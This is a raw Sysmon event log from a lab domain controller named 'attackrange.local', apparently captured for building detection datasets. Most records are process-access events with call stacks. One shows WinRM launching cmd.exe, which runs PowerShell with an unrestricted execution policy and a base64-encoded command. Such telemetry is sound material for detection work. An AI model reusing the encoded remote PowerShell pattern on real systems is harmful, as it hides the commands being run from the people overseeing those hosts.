13:52:29.837{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-851D-5FCF-E502-000000009001}43482592C:\Windows\system32\conhost.exe{10ACEC4A-851D-5FCF-E602-000000009001}4488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-851D-5FCF-E602-000000009001}4488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-851D-5FCF-E402-000000009001}44964548C:\Windows\system32\WinrsHost.exe{10ACEC4A-851D-5FCF-E602-000000009001}4488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.838{10ACEC4A-851D-5FCF-E602-000000009001}4488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851D-5FCF-E529-110000000000}0x1129e50HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-851D-5FCF-E402-000000009001}4496C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.837{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.821{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.821{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.821{10ACEC4A-83B9-5FCF-1400-000000009001}13281444C:\Windows\system32\svchost.exe{10ACEC4A-851D-5FCF-E402-000000009001}4496C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.821{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-851D-5FCF-E402-000000009001}4496C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-851D-5FCF-E502-000000009001}43482592C:\Windows\system32\conhost.exe{10ACEC4A-851D-5FCF-E402-000000009001}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-851D-5FCF-E502-000000009001}4348C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:29.805{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 